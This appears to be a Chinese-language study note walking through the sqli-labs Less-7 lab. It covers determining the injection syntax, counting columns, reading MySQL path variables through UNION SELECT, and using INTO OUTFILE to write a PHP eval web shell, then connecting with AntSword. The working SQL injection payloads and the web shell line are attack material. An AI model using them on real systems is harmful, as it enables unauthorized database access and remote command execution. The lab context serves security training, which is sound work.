Sqli-labs

GET - Dump into outfile - String（导出文件GET字符型注入）

尝试?id=1'，报错；尝试?id=1"，无报错。报错说明id后面跟的是单引号。

继续构造，发现?id=1')--+报错，?id=1'))--+正常，?id=1')))--+报错

则原语句为(('id'))

字段为3

http://192.168.147.133/Less-7/?id=1%27)) order by 3--+

参数作用

basedir：指定 MySQL 的安装路径
datadir：指定了 MySQL 的数据库文件路径
secure_file_priv：写入路径，为固定值或任意值

需要找到文件路径，鉴于这题没有回显，找一题有回显的来测

http://192.168.147.133/Less-1/?id=0' union select 1,@@basedir,@@datadir --+
http://192.168.147.133/Less-1/?id=0' union select 1,@@secure_file_priv,@@datadir --+

写入一句话，尽管报错，但是写入了

?id=1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "/var/lib/mysql/1.php"--+

之后用蚁剑连接

因为我的sqli-labs是拿docker容器搭在虚拟机上的，不知道绝对路径，就罢